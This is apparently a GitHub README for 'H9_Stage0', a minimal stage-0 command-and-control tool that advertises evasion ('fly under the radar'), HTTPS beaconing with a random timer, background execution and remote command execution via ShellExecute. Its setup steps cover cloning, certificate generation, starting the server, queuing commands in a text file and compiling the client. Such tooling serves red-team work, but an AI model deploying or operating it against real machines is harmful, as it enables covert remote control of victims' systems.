H9_Stage0
A minimalist stage-0 C2 designed to fly under the radar. It uses HTTPS and executes commands on the client-side.
Features:
- HTTPS used
- Random connection timer
- Runs in the background
ShellExecutefor command execution
Clone the repository
git clone https://github.com/ZERODETECTION/H9_Stage0.gitGenerate SSL certificates (self-signed)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodesStart the Stage-0 server
python3 stage0_svr.pyTo send commands, write directly into commands.txt:
echo "cmd /c calc" > commands.txtTo compile the client open a "x64 Native Tools Command Prompt for VS 2019" and run:
compile.bat